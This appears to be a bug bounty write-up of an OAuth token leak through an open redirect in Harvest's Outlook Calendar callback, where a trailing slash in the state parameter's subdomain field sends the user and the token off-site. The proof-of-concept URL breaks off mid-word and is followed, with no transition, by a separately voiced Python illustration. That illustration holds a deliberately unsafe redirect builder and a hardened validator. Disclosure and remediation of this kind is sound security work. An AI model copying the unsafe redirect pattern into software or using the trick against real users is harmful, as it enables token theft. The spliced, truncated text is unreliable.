Reported an OAuth token leak via open redirect in Harvest.
Posted on: 2023-10-21 22:33 - Reading Time: 4 min
Summary
Harvest is time-tracking software that lets users connect their Outlook Calendar through OAuth. After a successful grant of permission, the user is redirected to https://outlook-integration.harvestapp.com/auth/outlook-calendar/callback, which in turn redirects the user to the URL provided within the state parameter. This results in an open redirect, which can be used to steal access tokens issued through the implicit grant flow.
Proof of Concept
The bare open redirect that led to the token leak was found after a successful connection to Outlook Calendar using the OAuth connect page at https://hackerone295.harvestapp.com/outlook-calendar/connect. The resulting link was:
https://outlook-integration.harvestapp.com/auth/outlook-calendar/callback?state=%7b%22return_to%22:%22/%22%2c%22subdomain%22:%22hackerone295%22%7d
The state parameter in the above URL is a URI-encoded JSON object:
{"return_to":"/","subdomain":"hackerone295"}
The subdomain parameter is used to build the host of the Harvest workspace, i.e. hackerone295.harvestapp.com in the above case. Appending a forward slash to the subdomain parameter leads to an open redirect:
https://outlook-integration.harvestapp.com/auth/outlo
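To show why the trailing slash changes the redirect host and how the callback could validate the state object instead, here is an added illustration in Python (not Harvest's code). It assumes the state JSON shape shown above and a base domain of harvestapp.com; the function and constant names are hypothetical.

```python
import json
import re

# Assumed host suffix for the illustration; the label rule is a plain DNS-label check.
BASE_DOMAIN = "harvestapp.com"
SUBDOMAIN_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


def unsafe_redirect(state: str) -> str:
    """The flawed pattern: trust `state` and splice its fields straight into the URL.
    A trailing '/' in `subdomain` ends the host early, and the implicit-grant token
    in the URL fragment is carried along to whatever host precedes it."""
    data = json.loads(state)
    return "https://" + data["subdomain"] + "." + BASE_DOMAIN + data["return_to"]


def safe_return_path(return_to: str) -> str:
    """Accept only a same-origin path: one leading '/', no '//' or '/\\' prefix
    (protocol-relative), and no CR, LF or backslash."""
    if not isinstance(return_to, str) or not return_to.startswith("/"):
        raise ValueError("return_to must be an absolute path on this origin")
    if return_to.startswith(("//", "/\\")):
        raise ValueError("protocol-relative paths are not allowed")
    if any(c in return_to for c in "\r\n\\"):
        raise ValueError("control characters or backslashes in return_to")
    return return_to


def safe_redirect(state: str) -> str:
    """Hardened version: validate `subdomain` as a single DNS label and
    `return_to` as a relative path before assembling the host."""
    data = json.loads(state)
    if not isinstance(data, dict):
        raise ValueError("state must be a JSON object")
    subdomain = data.get("subdomain", "")
    if not isinstance(subdomain, str) or not SUBDOMAIN_RE.match(subdomain):
        raise ValueError(f"invalid subdomain label: {subdomain!r}")
    path = safe_return_path(data.get("return_to", "/"))
    # A valid label cannot contain '/', '@', ':' or '.', so the host is fixed here.
    return f"https://{subdomain}.{BASE_DOMAIN}{path}"


def accepted(state: str) -> bool:
    """Helper for checking whether safe_redirect() accepts a state value."""
    try:
        safe_redirect(state)
        return True
    except ValueError:
        return False
```

A stronger fix still is to carry an opaque server-side session key in state and look the subdomain up from it, so nothing user-controlled reaches the host position at all.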